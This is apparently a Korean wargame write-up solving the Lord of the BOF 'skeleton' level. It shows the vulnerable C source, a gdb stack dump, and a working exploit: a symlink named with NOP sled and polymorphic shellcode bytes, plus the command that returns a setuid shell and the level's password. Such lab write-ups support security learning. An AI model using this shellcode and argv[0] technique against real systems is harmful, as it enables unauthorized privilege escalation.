아오 어제 계속 안풀려서 멘붕왔는데 드디어 풀렸네요
문제 풀때 제가했던 뻘짓거리들 입니다
소스를 보면
[vampire@localhost vampire]$ cat skeleton.c
/*
The Lord of the BOF : The Fellowship of the BOF
- skeleton
- argv hunter
*/
#include <stdio.h>
#include <stdlib.h>
extern char **environ;
/*
 * Entry point of the "skeleton" LOB target: wipes the environment strings,
 * takes a single command-line argument and copies it into a fixed-size
 * stack buffer, then wipes that buffer and every argv string.
 *
 * Note: no return type is written (implicit int, pre-C99), and memset(),
 * strlen() and strcpy() are used although only <stdio.h> and <stdlib.h>
 * are included above, so they are implicitly declared here.
 */
main(int argc, char *argv[])
{
    char buffer[40];       /* destination of the strcpy() below: 40 bytes */
    int i, saved_argc;

    /* Require at least one argument; exit status is 0 even on this error path. */
    if(argc < 2){
        printf("argv error\n");
        exit(0);
    }

    // egghunter
    /* Zero every environment string in place (only the bytes up to each
     * terminator), so nothing placed in the environment survives to the
     * code below. */
    for(i=0; environ[i]; i++)
        memset(environ[i], 0, strlen(environ[i]));

    /* Byte 47 of argv[1] is read here BEFORE the length check further down;
     * NOTE(review): for an argument shorter than 48 bytes this is an
     * out-of-bounds read past its terminator (undefined behaviour). */
    if(argv[1][47] != '\xbf')
    {
        printf("stack is still your friend.\n");
        exit(0);
    }

    // check the length of argument
    /* Accepts up to 48 characters, i.e. 49 bytes with the terminator,
     * while buffer holds only 40 — this bound does not protect the
     * strcpy() below. */
    if(strlen(argv[1]) > 48){
        printf("argument is too long!\n");
        exit(0);
    }

    // argc saver
    saved_argc = argc;

    /* Stack buffer overflow: up to 49 bytes are copied into a 40-byte
     * array. A bounded copy (e.g. snprintf(buffer, sizeof buffer, "%s",
     * argv[1])) or a check of strlen(argv[1]) >= sizeof buffer would
     * prevent it. */
    strcpy(buffer, argv[1]);
    printf("%s\n", buffer);

    // buffer hunter
    /* Clear the local buffer — only its declared 40 bytes, not anything
     * the copy above may have written beyond it. */
    memset(buffer, 0, 40);

    // ultra argv hunter!
    /* Zero every argv string in place, argv[0] included, using the argument
     * count saved before the copy. */
    for(i=0; i<saved_argc; i++)
        memset(argv[i], 0, strlen(argv[i]));
    /* No return statement: the value returned from main is unspecified. */
}
추가된 부분에 의해서 기존에 사용했던 RTL 방법이라든가 주입식 쉘코드는 사용할 수 없게 됩니다
(소스보고 알면서도 자꾸 위의 방법을 써보게되네요 )
굵은 부분이 추가되었습니다. 더불어 저의 멘붕도 추가되었죠
한참헤매다가 나락에서 빛을 보았습니다
계속 디버깅해 보다가 왠지는 모르겠는데 자꾸 맨 끝부분에 경로가 남더군요. 그래서 이걸 이용해야겠다 싶어서
심볼릭링크를 걸고 retn 주소에 심볼릭링크의 경로부분을 넣어주었습니다
즉, 심볼릭 링크에 다형성 쉘코드를 넣어주었고,
페이로드는 간단합니다
|다형성 쉘코드 argv[0] | buffer[40] | SFP[4] | &다형성 쉘코드 주소 |
따라서 ,
[vampire@localhost /tmp]$ ln -s skeleton `perl -e 'print "\x90"x40,"\x68\x8a\xe2\xce\x81\x68\xb1\x0c\x53\x54\x68\x6a\x6f\x8a\xe4\x68\x01\x69\x30\x63\x68\x69\x30\x74\x69\x6a\x14\x59\xfe\x0c\x0c\x49\x79\xfa\x41\xf7\xe1\x54\xc3"'`
[vampire@localhost /tmp]$ gdb -q `perl -e 'print "\x90"x40,"\x68\x8a\xe2\xce\x81\x68\xb1\x0c\x53\x54\x68\x6a\x6f\x8a\xe4\x68\x01\x69\x30\x63\x68\x69\x30\x74\x69\x6a\x14\x59\xfe\x0c\x0c\x49\x79\xfa\x41\xf7\xe1\x54\xc3"'`
(gdb) b *main+368
Breakpoint 1 at 0x8048670
(gdb) r $(perl -e 'print "\xbf"x48')
Starting program: /tmp/????????????????????????????????????????h?須?h
켚Thjo??i0chi0tijY
?y?投T?$(perl -e 'print "\xbf"x48')
옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜
Breakpoint 1, 0x8048670 in main ()
(gdb) x/1000x $esp
0xbffffa28: 0x00000002 0x00000002 0x00000000 0x00000000
0xbffffa38: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffa48: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffa58: 0xbfbfbfbf 0xbfbfbfbf 0x00000000 0xbffffaa4
0xbffffa68: 0xbffffab0 0x40013868 0x00000002 0x08048450
0xbffffa78: 0x00000000 0x08048471 0x08048500 0x00000002
0xbffffa88: 0xbffffaa4 0x08048390 0x080486ac 0x4000ae60
0xbffffa98: 0xbffffa9c 0x40013e90 0x00000002 0xbffffb9a
0xbffffaa8: 0xbffffbef 0x00000000 0xbffffc20 0xbffffc29
0xbffffab8: 0xbffffc41 0xbffffc60 0xbffffc82 0xbffffc8f
0xbffffac8: 0xbffffe52 0xbffffe71 0xbffffe8e 0xbffffea3
0xbffffad8: 0xbffffec2 0xbffffecd 0xbffffee6 0xbffffef6
0xbffffae8: 0xbffffefe 0xbfffff0f 0xbfffff19 0xbfffff27
0xbffffaf8: 0xbfffff38 0xbfffff46 0xbfffff51 0xbfffff64
0xbffffb08: 0x00000000 0x00000003 0x08048034 0x00000004
0xbffffb18: 0x00000020 0x00000005 0x00000006 0x00000006
0xbffffb28: 0x00001000 0x00000007 0x40000000 0x00000008
0xbffffb38: 0x00000000 0x00000009 0x08048450 0x0000000b
0xbffffb48: 0x000001fd 0x0000000c 0x000001fd 0x0000000d
0xbffffb58: 0x000001fd 0x0000000e 0x000001fd 0x00000010
0xbffffb68: 0x0fabfbff 0x0000000f 0xbffffb95 0x00000000
0xbffffb78: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffb88: 0x00000000 0x00000000 0x00000000 0x38366900
0xbffffb98: 0x00000036 0x00000000 0x00000000 0x00000000
0xbffffba8: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffbb8: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffbc8: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffbd8: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffbe8: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffbf8: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffc08: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffc18: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffc28: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffc38: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffc48: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffc58: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffc68: 0x00000000 0x00000000 0x00000000 0x00000000
---Type <return> to continue, or q <return> to quit---
0xbffffc78: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffc88: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffc98: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffca8: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffcb8: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffcc8: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffcd8: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffce8: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffcf8: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffd08: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffd18: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffd28: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffd38: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffd48: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffd58: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffd68: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffd78: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffd88: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffd98: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffda8: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffdb8: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffdc8: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffdd8: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffde8: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffdf8: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffe08: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffe18: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffe28: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffe38: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffe48: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffe58: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffe68: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffe78: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffe88: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffe98: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffea8: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffeb8: 0x00000000 0x00000000 0x00000000 0x00000000
---Type <return> to continue, or q <return> to quit---
0xbffffec8: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffed8: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffee8: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffef8: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfffff08: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfffff18: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfffff28: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfffff38: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfffff48: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfffff58: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfffff68: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfffff78: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfffff88: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfffff98: 0x00000000 0x00000000 0x00000000 0x2f000000
0xbfffffa8: 0x2f706d74 0x90909090 0x90909090 0x90909090
0xbfffffb8: 0x90909090 0x90909090 0x90909090 0x90909090
0xbfffffc8: 0x90909090 0x90909090 0x90909090 0xcee28a68
0xbfffffd8: 0x0cb16881 0x6a685453 0x68e48a6f 0x63306901
0xbfffffe8: 0x74306968 0x59146a69 0x490c0cfe 0xf741fa79
0xbffffff8: 0x00c354e1 0x00000000 Cannot access memory at address 0xc0000000
(gdb)
끝부분을 보면 조금 뭉개지는 부분이 있습니다만 NOP를 넣어서 해결해주었고 , NOP 임의의 부분을 넣어주게 되면
[vampire@localhost vampire]$ ./`perl -e 'print "\x90"x40,"\x68\x8a\xe2\xce\x81\x68\xb1\x0c\x53\x54\x68\x6a\x6f\x8a\xe4\x68\x01\x69\x30\x63\x68\x69\x30\x74\x69\x6a\x14\x59\xfe\x0c\x0c\x49\x79\xfa\x41\xf7\xe1\x54\xc3"'` `perl -e 'print "\x90"x44,"\xb8\xff\xff\xbf"'`
?????????????????????????????????????????????
bash$ my-pass
euid = 510
shellcoder
bash$
쉘이 따였습니다 ..